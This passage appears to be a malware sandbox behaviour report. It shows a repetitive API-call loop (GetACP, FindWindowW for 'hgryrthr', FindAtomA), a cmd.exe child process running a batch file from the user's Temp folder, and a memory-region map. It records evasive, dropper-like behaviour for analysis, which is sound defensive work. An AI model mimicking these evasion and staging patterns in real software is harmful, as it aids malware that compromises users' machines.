[0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () 
returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.557] GetACP () returned 0x4e4 [0163.557] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.557] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 
[0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.558] GetACP () returned 0x4e4 [0163.558] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.558] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.655] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.656] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.657] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA 
(lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.658] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.659] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.660] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] 
FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.661] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.662] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.663] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 
[0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.664] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.665] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.666] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.667] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) 
returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.668] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.669] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.670] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.671] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA 
(lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.673] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.674] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.675] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.676] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] 
FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.677] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 [0163.678] FindAtomA (lpString=0x0) returned 0x0 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x19c3f000" os_pid = "0xcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1125 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1126 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1127 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 
region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1128 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1129 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1130 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1131 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1132 start_va = 0x4ac10000 end_va = 0x4ac5bfff entry_point = 0x4ac10000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1133 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1134 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1135 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1136 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1137 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1138 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007efdf000" filename = "" Region: id = 1139 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1141 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1142 start_va = 0x580000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1143 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1144 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1145 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1146 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1147 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1148 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1149 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" 
Region: id = 1150 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1151 start_va = 0x75760000 end_va = 0x75766fff entry_point = 0x75760000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1152 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1153 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1154 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1155 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1156 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1157 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1158 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") 
Region: id = 1159 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1160 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1161 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1162 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1163 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1164 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1165 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1166 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1167 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1168 start_va = 0x880000 end_va = 0xa07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1169 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = 
"msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1170 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1171 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1172 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1173 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1174 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1175 start_va = 0xa10000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1176 start_va = 0xba0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 1177 start_va = 0x1fa0000 end_va = 0x22e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 1178 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1958 start_va = 0x22f0000 end_va = 0x25befff entry_point = 0x22f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 61 os_tid = 0x780 [0160.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ff8dc | out: lpSystemTimeAsFileTime=0x3ff8dc*(dwLowDateTime=0x62002070, dwHighDateTime=0x1d4406f)) 
